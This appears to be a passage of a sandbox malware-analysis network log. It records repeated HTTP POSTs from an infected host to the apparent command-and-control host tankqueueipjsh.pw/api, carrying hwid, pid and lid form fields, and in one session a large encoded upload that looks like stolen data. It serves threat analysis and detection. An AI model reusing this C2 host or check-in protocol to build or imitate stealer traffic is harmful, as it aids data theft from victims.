                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        28192.168.2.550214104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:15.874066114 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:15.874309063 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:16.222630024 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:16 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=vgsj53l4g55b43a3ksmoprkb7g; expires=Sun, 31 Mar 2024 07:21:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:16 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:16 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:16 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gROv3Syu0NjIaHh%2F4GbMDoipzJBfL6ZjXIEGBs5T3LhyCZ8lrFfrx9nIVEig%2Fhn6eT5sdi%2Fr1v6XjsITld3%2Fk3Apm11B%2FjVA3WYWNmlprlH8p85VBDh1OUzvDHtZpJVnzfdDAQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server:
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:16.222687960 CET124INData Raw: 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 33 63 37 61 36 36 32 39 62 62 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: loudflareCF-RAY: 8314e93c7a6629bb-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:16.222723961 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        29192.168.2.550215104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:16.530575991 CET337OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 19248
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:16.530786991 CET11628OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:16.625039101 CET1340OUTData Raw: c5 83 cd ff 5c e5 7b 15 ee ed 7a 65 99 ab dd 5e 7a b6 fa f7 e0 e7 fb 95 d7 2a 67 2a 3f 7d 0c ee 88 5c eb e2 c5 83 13 40 0f a9 63 93 5e cf ee 92 30 f0 d9 c9 a8 84 ba ec 04 5d 59 b8 9e 3b ef 51 26 c5 af f0 f4 51 2f 88 69 ee d0 e1 f8 04 4b ee d8 d3
                                                                                                                                                                                                                                                                        Data Ascii: \{ze^z*g*?}\@c^0]Y;Q&Q/iKB{Ka3~naWnn^io~^(U#{I7 ON@'_<~5:Du':3l7|Ha-w&=vvGtO!9X"1^X?AYz]
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:16.625155926 CET2626OUTData Raw: d9 21 b4 71 48 ee e4 47 92 92 b4 9f 4c 1d fc 1a 1e 28 73 82 61 de 31 7d d0 0f e2 c9 09 8e 43 02 6e d4 ed 75 e8 e4 ac 48 7b b0 77 f1 44 6b 70 da aa ee 1b d9 d1 a2 f1 e1 ac fc a9 a2 90 74 a9 9d 9d 32 84 2a c4 5d 3b 09 b6 43 92 1d bc f2 03 da f1 26
                                                                                                                                                                                                                                                                        Data Ascii: !qHGL(sa1}CnuH{wDkpt2*];C&_i7~s$8$H.O\z?V||1V|m+4S|?j,QaPvktRq?)8)Njx#-f_}F^:^bn?I.;
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:16.625214100 CET3870OUTData Raw: 2b 50 25 07 3a 95 29 41 ae aa 2a 09 ba e2 68 ae 6f 5a 96 23 49 0f 1f 3e 2c ee 51 10 0a 39 cf 8b 2e ca fd af 9c 80 2e 7d a2 76 0d 72 d7 65 4b 35 2d e8 4e a2 a1 80 81 4b aa 22 10 aa 19 82 a7 eb 44 d1 24 95 12 45 27 6e 36 34 9f eb 06 6e 1c 25 91 9f
                                                                                                                                                                                                                                                                        Data Ascii: +P%:)A*hoZ#I>,Q9..}vreK5-NK"D$E'n64n%|/f[:Up=hZ!hZDpG1O)NQ_QI/N;f7M]/H\YR(J77kYO-S$5\(2cf28AE
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:17.005462885 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:16 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=n8uo736gms9j2el1gqsirm8a98; expires=Sun, 31 Mar 2024 07:21:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:16 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:16 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:16 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=myKF0WSZYPVyH%2BCwTR8IbgyM408FPbmTgVnkrNJCgDdsf%2FY06D2bmWJA38om8JsNPYzba50FsZI5YIsgqVtvcFwZEAWILcJ6ALgM6qlXgYrbjuJgwCntHqt%2FAAEXtQWIVL5SRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: clou
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:17.005500078 CET115INData Raw: 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 34 30 38 61 38 64 33 39 32 30 2d 49 41 44 0d 0a 0d 0a 31 30 0d 0a 6f 6b 20 31 30 32 2e 31 36 35 2e 34 38 2e 38 33 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: flareCF-RAY: 8314e9408a8d3920-IAD10ok 102.165.48.83
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:17.005532980 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        30192.168.2.550216104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:17.119395018 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:17.119936943 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:17.468427896 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:17 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=8n3vcgml9i1fpsh5qts1k03369; expires=Sun, 31 Mar 2024 07:21:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:17 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:17 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:17 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZGiywLHy7DWZ5s1UkQHI5r8RP5H4m5W92KMnx4rYpKw7IKI6Y47CcDUMjOQzg7Eqvg6TD0xyqch%2BndOG6InKNjPsW3NE889lk1dtvZSkShWEFRl5xkBLGAkHwu5%2FLBl5PP9afA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudf
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:17.468481064 CET118INData Raw: 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 34 34 33 39 39 38 38 32 65 63 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: areCF-RAY: 8314e944399882ec-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:17.468518019 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        31192.168.2.550217104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:17.575318098 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:17.575537920 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:17.839139938 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:17 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=tbjkbrnjd379oqogevtruign6d; expires=Sun, 31 Mar 2024 07:21:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:17 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:17 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:17 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Z%2BjBDlvsi6DovV99NXYzr2MY%2BMd6WwOJyRUh8Zrz%2BaTst1bMg34QOPlut14MbsaVlrFnMrFZlckVxWg4iPtSW%2Fks%2FwseEPeBbaQo6gaVISRxVGQ5sUULbQVJBs7BDcMA4hLvYA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server:
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:17.839164019 CET124INData Raw: 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 34 37 31 38 34 62 33 39 39 65 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: loudflareCF-RAY: 8314e947184b399e-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:17.839179039 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        32192.168.2.550218104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:17.945483923 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:17.945735931 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:18.294627905 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:18 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=66csca11r93gd7uq6vpeft0tuf; expires=Sun, 31 Mar 2024 07:21:57 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:18 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:18 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:18 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MVn7JadBwC0UH7HgX717gKNsR8ABpgfbqdToUbixxaDrnZh%2B26upNRLMafivIuc2ETNmcsV7Ey2jL7D3EsV00iENv4kZUpklvrU4XxT%2FHgQ0z91%2F9SgeY1R5ijV5Bu8bXgDTBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: clou
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:18.294667959 CET120INData Raw: 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 34 39 36 65 39 66 33 62 31 64 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: flareCF-RAY: 8314e9496e9f3b1d-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:18.294749975 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        33192.168.2.550219104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:18.399358988 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:18.399359941 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:18.866661072 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:18 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=svu0tdsomjgmtotsviljho2eb2; expires=Sun, 31 Mar 2024 07:21:57 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:18 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:18 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:18 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xHQWOXdxpDU%2F7QZj9M7PQQj8gRXy5yBQI1iCK89mAnGC6pRnHYoWJliUPKudlKktxkVf5iZgXPNihsy%2B1JZqAREHKLc2xDsMbBkyEI6F4cuydb34JBIazJGycngAxpLO1a5DcQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudf
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:18.866697073 CET118INData Raw: 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 34 63 33 61 39 38 30 38 31 62 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: areCF-RAY: 8314e94c3a98081b-IAD15Malformed packet data
